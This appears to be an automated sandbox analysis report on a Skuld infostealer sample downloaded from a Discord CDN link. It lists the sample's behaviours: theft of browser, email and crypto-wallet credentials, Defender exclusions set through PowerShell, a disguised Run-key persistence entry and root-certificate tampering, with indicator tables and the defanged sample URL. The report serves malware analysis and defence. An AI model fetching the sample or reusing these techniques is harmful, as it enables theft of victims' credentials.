skuld | hxxps://cdn[.]discordapp[.]com/attachments/1282151429091495947/1282496522574893074/rename_1[.]exe?ex=66df9176&is=66de3ff6&hm=7de87238a1c015a7964d0f67b15efc5d96416981adc21c9759323256cf3718a9&

Analysis

max time kernel
1200s
max time network
1147s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
09-09-2024 00:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1282151429091495947/1282496522574893074/rename_1.exe?ex=66df9176&is=66de3ff6&hm=7de87238a1c015a7964d0f67b15efc5d96416981adc21c9759323256cf3718a9&

Score

10^/10

skuld credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

5124 powershell.exe
5412 powershell.exe
Downloads MZ/PE file

pid	process
5124	powershell.exe
5412	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

attrib.exerename (1).exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	rename (1).exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 2 IoCs

Processes:

rename (1).exerename (1).exe

pid process

640 rename (1).exe
6100 rename (1).exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
640	rename (1).exe
6100	rename (1).exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Unconfirmed 315498.crdownload	upx
behavioral1/memory/640-80-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-149-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-148-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/6100-165-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-166-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-171-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-181-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-188-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-212-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-213-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-214-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-215-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-216-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-219-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-222-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-223-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-233-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-234-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-235-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-236-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-237-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-238-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-239-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-240-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-241-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-242-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-243-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-244-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-245-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-246-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-247-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-248-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-249-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-250-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-251-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-252-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-253-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-254-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-255-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-256-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-257-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-258-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-259-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-260-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-261-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-262-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-272-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-273-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-274-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-275-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-276-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-277-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-278-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-279-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-280-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-281-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-282-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-283-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-284-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-285-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-286-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-287-0x0000000000600000-0x00000000014DD000-memory.dmp	upx
behavioral1/memory/640-288-0x0000000000600000-0x00000000014DD000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

rename (1).exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	rename (1).exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

33 api.ipify.org
34 api.ipify.org
35 ip-api.com

flow	ioc
33	api.ipify.org
34	api.ipify.org
35	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

rename (1).exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	rename (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	rename (1).exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
discovery

Wi-Fi Discovery
T1016.002

Processes:

netsh.exe

pid process

5580 netsh.exe
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exewmic.exe

pid process

5340 wmic.exe
2992 wmic.exe

pid	process
5580	netsh.exe

pid	process
5340	wmic.exe
2992	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 36 Go-http-client/1.1

description	flow	ioc
HTTP User-Agent header	36	Go-http-client/1.1

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

rename (1).exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	rename (1).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	rename (1).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	rename (1).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	rename (1).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	rename (1).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	rename (1).exe

NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\Unconfirmed 315498.crdownload:SmartScreen msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 315498.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exerename (1).exepowershell.exepowershell.exe

pid	process
1220	msedge.exe
1220	msedge.exe
4896	msedge.exe
4896	msedge.exe
4012	identity_helper.exe
4012	identity_helper.exe
752	msedge.exe
752	msedge.exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
5124	powershell.exe
5124	powershell.exe
640	rename (1).exe
640	rename (1).exe
5124	powershell.exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
5412	powershell.exe
5412	powershell.exe
640	rename (1).exe
640	rename (1).exe
5412	powershell.exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe
640	rename (1).exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

4896 msedge.exe
4896 msedge.exe
4896 msedge.exe
4896 msedge.exe
4896 msedge.exe
4896 msedge.exe
4896 msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

rename (1).exewmic.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	640	rename (1).exe
Token: SeIncreaseQuotaPrivilege	4368	wmic.exe
Token: SeSecurityPrivilege	4368	wmic.exe
Token: SeTakeOwnershipPrivilege	4368	wmic.exe
Token: SeLoadDriverPrivilege	4368	wmic.exe
Token: SeSystemProfilePrivilege	4368	wmic.exe
Token: SeSystemtimePrivilege	4368	wmic.exe
Token: SeProfSingleProcessPrivilege	4368	wmic.exe
Token: SeIncBasePriorityPrivilege	4368	wmic.exe
Token: SeCreatePagefilePrivilege	4368	wmic.exe
Token: SeBackupPrivilege	4368	wmic.exe
Token: SeRestorePrivilege	4368	wmic.exe
Token: SeShutdownPrivilege	4368	wmic.exe
Token: SeDebugPrivilege	4368	wmic.exe
Token: SeSystemEnvironmentPrivilege	4368	wmic.exe
Token: SeRemoteShutdownPrivilege	4368	wmic.exe
Token: SeUndockPrivilege	4368	wmic.exe
Token: SeManageVolumePrivilege	4368	wmic.exe
Token: 33	4368	wmic.exe
Token: 34	4368	wmic.exe
Token: 35	4368	wmic.exe
Token: 36	4368	wmic.exe
Token: SeIncreaseQuotaPrivilege	4368	wmic.exe
Token: SeSecurityPrivilege	4368	wmic.exe
Token: SeTakeOwnershipPrivilege	4368	wmic.exe
Token: SeLoadDriverPrivilege	4368	wmic.exe
Token: SeSystemProfilePrivilege	4368	wmic.exe
Token: SeSystemtimePrivilege	4368	wmic.exe
Token: SeProfSingleProcessPrivilege	4368	wmic.exe
Token: SeIncBasePriorityPrivilege	4368	wmic.exe
Token: SeCreatePagefilePrivilege	4368	wmic.exe
Token: SeBackupPrivilege	4368	wmic.exe
Token: SeRestorePrivilege	4368	wmic.exe
Token: SeShutdownPrivilege	4368	wmic.exe
Token: SeDebugPrivilege	4368	wmic.exe
Token: SeSystemEnvironmentPrivilege	4368	wmic.exe
Token: SeRemoteShutdownPrivilege	4368	wmic.exe
Token: SeUndockPrivilege	4368	wmic.exe
Token: SeManageVolumePrivilege	4368	wmic.exe
Token: 33	4368	wmic.exe
Token: 34	4368	wmic.exe
Token: 35	4368	wmic.exe
Token: 36	4368	wmic.exe
